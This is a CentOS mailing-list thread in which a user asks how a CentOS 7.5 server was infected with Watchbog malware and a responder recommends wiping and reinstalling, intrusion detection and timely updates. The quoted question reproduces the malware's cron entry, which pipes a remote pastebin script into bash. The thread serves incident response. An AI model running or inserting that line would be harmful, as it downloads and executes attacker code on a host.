[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Mon Dec 17 21:58:03 UTC 2018
Pete Biggs <pete at biggs.org.uk>

> Is there a way to find out how the CentOS 7.5 Linux box got infected with
> malware?
> Currently i am referring to
> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
> to carry out the below steps and is done manually.
> 
> 1)rm -fr /tmp/*timesyncc.service*
> 2)crontab -e -u apigee
> delete the cron entry
> */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
> 3)ps aux | grep watchbog
> kill -9 pidof watchbog
> 
> Any suggestions or recommendations to find out how CentOS 7.5 Linux box got
> infected with Watchbog Malware. 

Well, if the infected crontab is owned by user 'apigee' then it would
suggest that whatever runs as that user is the source of the infection.
The malware appears to try to elevate its privs, and if it's successful
it modifies various system files.  What you are seeing in the 'apigee'
crontab is just the tip of the iceberg.

It is unlikely that what is in that blog will successfully get rid of
all the malware - it will probably stop it running, but your system
will still have the malware on it and it may have left other backdoors
into your system.

The *ONLY* way of being sure your system is clean is to wipe and
reinstall. (And make sure that if you restore from backup, that the
backup is clean.)

> Is there any open source software which can
> be installed on CentOS 7.5 Linux box to detect and prevent Malware?
> 
Yes, lots, although most centre around detecting the intrusion rather
than preventing it - the classic way of detecting intrusions in the
past has been Tripwire, but it's a long time since I used it and there
are no doubt better things around. Search for "linux intrusion
detection tools".

For prevention, by far the best way is to keep your system and
application software up to date.  The intrusions work by elevating
privilege to root, and that elevation requires either a knowledge of
passwords/keys or the ability to leverage vulnerabilities. The first is
mitigated by strong passwords and proper security housekeeping; the
second by regularly updating your system especially with security
updates.

P.